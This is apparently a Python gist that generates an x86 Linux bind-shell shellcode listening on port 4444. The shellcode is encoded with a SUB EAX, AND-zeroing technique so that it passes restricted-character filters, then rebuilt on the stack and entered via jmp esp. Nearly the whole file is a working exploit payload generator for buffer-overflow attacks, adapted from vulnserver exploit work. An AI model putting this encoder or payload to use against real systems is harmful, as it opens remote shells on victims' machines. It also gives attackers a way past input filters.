bind shell shellcode encoded with SUB EAX technique
#!/usr/bin/env python | |
# Please install shellerate>=0.4.2 before: pip install shellerate | |
import sys | |
import string | |
import logging | |
import secrets | |
from shellerate import strings; | |
from shellerate import asm_x86; | |
from shellerate.bind_shellcode import BindShellcode; | |
# The code for find_encoded_sequence and generate_add_eax_sum_shellcode was
# taken from the https://www.kerrymilan.com vulnserver work, with some slight
# changes, and integrated into shellerate
def find_encoded_sequence(dword, three=False):
    """Decompose *dword* byte by byte into sums of allowed operand bytes.

    The value is consumed least-significant byte first.  For every byte the
    first tuple of two (three when ``three`` is true) bytes from the allowed
    set whose sum modulo 256 equals that byte is recorded; a sum of 0x100 or
    more raises a carry that is subtracted from the remaining value before
    the next byte is read.  The allowed set is 0x01-0x09, 0x31-0x39,
    0x3b-0x3e and 0x41-0x7e (no NUL, no 0x0a-0x30).  A byte with no matching
    tuple is skipped without notice, so the result may hold fewer than four
    tuples -- the caller is expected to re-sum the result and verify it.

    Args:
        dword: non-negative integer whose low four bytes are decomposed.
        three: search tuples of three operands instead of two.

    Returns:
        List of operand tuples, one per matched byte, least-significant
        byte first.
    """
    allowed = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3b\x3c\x3d\x3e\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7d"
    allowed_ints = [ord(ch) for ch in allowed]
    allowed_set = set(allowed_ints)

    def candidates():
        # Enumerates operand tuples in the same order as nested
        # comprehensions over allowed_ints would, so the first hit is stable.
        for first in allowed_ints:
            for second in allowed_ints:
                if three:
                    for third in allowed_ints:
                        yield (first, second, third)
                else:
                    yield (first, second)

    matches = []
    remaining = dword
    carry = 0
    for _ in range(4):
        target = (remaining - carry) % 256
        for candidate in candidates():
            total = sum(candidate)
            # The subset check is always satisfied (candidates are drawn from
            # the allowed set); it is kept as an explicit invariant.
            if total % 256 == target and allowed_set >= set(candidate):
                carry = total >= 0x100
                matches.append(candidate)
                break
        remaining >>= 8
    return matches
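def _operand_dwords(sequence):
    """Transpose per-byte operand tuples into one hex dword per operand."""
    # sequence is least-significant byte first; reversing it makes each
    # joined column read as a big-endian dword string.
    return ["".join("{:02x}".format(b) for b in column) for column in zip(*sequence[::-1])]


def _hex_sum(dwords):
    """Sum hex dword strings modulo 2**32 and format as ``0x%08x``."""
    return "0x{:08x}".format(sum(int(d, 16) for d in dwords) % (2**32))


def generate_add_eax_sum_shellcode(result):
    """Emit x86 bytes that leave the dword *result* in EAX and push it.

    ``result`` is an 8-hex-digit string.  Its two's complement is split into
    per-byte operand tuples by ``find_encoded_sequence`` and each operand
    position is turned into one dword; subtracting those dwords from a zeroed
    EAX gives ``result`` modulo 2**32.  When the two-operand decomposition
    does not re-sum to the complement, the search is repeated with three
    operands (much slower).  A ``result`` of all zeros yields a 33-bit
    complement that can never re-sum, so it is always rejected.

    Args:
        result: dword to reproduce, as eight hex characters without ``0x``.

    Returns:
        Hex-escaped (``\\x..``) shellcode: the zeroing prologue from
        ``asm_x86.zero_with_and``, one ``SUB EAX, imm32`` (``\\x2d``) per
        operand dword and a trailing ``PUSH EAX`` (``\\x50``).  The empty
        string when no valid decomposition exists; an error is logged.
    """
    compl_two = int("FFFFFFFF", 16) - int(result, 16) + 1
    expected = "0x{:08x}".format(compl_two)
    operands = _operand_dwords(find_encoded_sequence(compl_two))
    if expected != _hex_sum(operands):
        logging.warning("can't find a good encoded sequence using 2 operands... trying with 3")
        operands = _operand_dwords(find_encoded_sequence(compl_two, True))
        if expected != _hex_sum(operands):
            # Fixed: the original message ran the sentence into the value.
            logging.error("can't find a good encoded sequence. Please consider changing this shellcode sequence " + result)
            return ""
    logging.debug("obtaining 0x{0} with this ASM sequence".format(result))
    for and_mask in ("554e4d4a", "2a313235"):
        logging.debug("AND EAX, 0x{0}".format(and_mask))
    for dword in operands:
        logging.debug("SUB EAX, 0x{0}".format(dword))
    logging.debug("PUSH EAX")
    shellcode = asm_x86.zero_with_and("eax")
    for dword in operands:
        # strings.swap / from_string_to_payload come from shellerate; by
        # their names they byte-swap the immediate and escape it.
        shellcode += "\\x2d" + strings.from_string_to_payload(strings.swap(dword))
    shellcode += "\\x50"
    return shellcode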
def generate_exploit():
    """Build the encoded bind-shell payload from shellerate's x86 Linux stub.

    The raw bind shellcode (port 4444) is passed through ``strings.pad``,
    ``strings.from_char_to_hexcode`` and ``strings.reverse`` (padding,
    hex conversion and reversal, by their names), then cut into 8-character
    words.  Each word is reproduced by ``generate_add_eax_sum_shellcode``,
    whose ``PUSH EAX`` rebuilds the bytes on the stack, after a prologue that
    zeroes EAX and -- per ``get_esp_address_in_eax`` -- loads the stack
    pointer into it.  The payload ends with ``\\xff\\xe4`` (``jmp esp``).

    Returns:
        Hex-escaped shellcode string.
    """
    builder = BindShellcode(4444, 'x86', 'linux')
    builder.generate()
    padded = strings.pad(builder.shellcode())
    reversed_hex = strings.reverse(strings.from_char_to_hexcode(padded))
    logging.debug(reversed_hex)

    parts = [asm_x86.zero_eax(), asm_x86.get_esp_address_in_eax()]
    for word in strings.split(reversed_hex, 8):
        logging.debug(word)
        parts.append(generate_add_eax_sum_shellcode(word))
    parts.append("\\xff\\xe4")
    return "".join(parts)
if __name__ == "__main__":
    # Debug level on purpose: the encoder logs every ASM step it emits.
    log_settings = {
        "format": '[%(levelname)s] %(asctime)s - %(message)s',
        "level": logging.DEBUG,
        "datefmt": '%d/%b/%y %H:%M:%S',
    }
    logging.basicConfig(**log_settings)
    logging.debug("GENERATING shellcode")
    print(generate_exploit())